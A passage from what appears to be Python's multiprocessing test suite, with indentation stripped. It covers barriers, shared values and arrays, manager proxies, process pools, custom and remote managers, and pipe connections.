"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_nested_queue(self):
a = self.list() # Test queue inside list
a.append(self.Queue())
a[0].put(123)
self.assertEqual(a[0].get(), 123)
b = self.dict() # Test queue inside dict
b[0] = self.Queue()
b[0].put(456)
self.assertEqual(b[0].get(), 456)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
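# Module-level helpers for the Pool tests; they have to be defined at
# module level so that they can be pickled and sent to worker processes.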
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
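# CountedObject keeps a class-level count of live instances, so that
# test_release_task_refs() can check that the pool drops its references
# to task arguments and results.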
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
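# SayWhenError and exception_throwing_generator() let the Pool tests
# inject a failure at a chosen point of an input iterable (when == -1
# raises before the first item is produced).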
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# exiting the with-block calls pool.terminate()
# the pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with warnings_helper.check_warnings(
('unclosed running multiprocessing pool', ResourceWarning)):
pool = None
support.gc_collect()
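# Helpers for _TestPoolWorkerErrors below: raising() exercises the error
# callback path, while unpickleable_result() returns a lambda that cannot
# be pickled back to the parent process.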
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
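# IteratorProxy exposes only __next__ so the baz() generator can be
# iterated through a proxy; FooBar and baz are the callables registered
# on MyManager below.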
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
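# QueueManager serves the shared queue from the server process, while
# QueueManager2 only declares the 'get_queue' method so that clients can
# call it remotely; both are exercised with xmlrpclib serialization.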
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize the object as a list, not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle, this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
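# An empty byte string is the sentinel which tells the _echo() child
# below to stop echoing and close its end of the connection.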
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
        really_big_msg = latin('X') * (1024 * 1024 * 16)   # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
        # We test that a pipe connection can be closed by the parent
        # process immediately after the child is spawned. On Windows this
        # sometimes failed on old versions because child_conn would be
        # closed before the child got a chance to duplicate it.
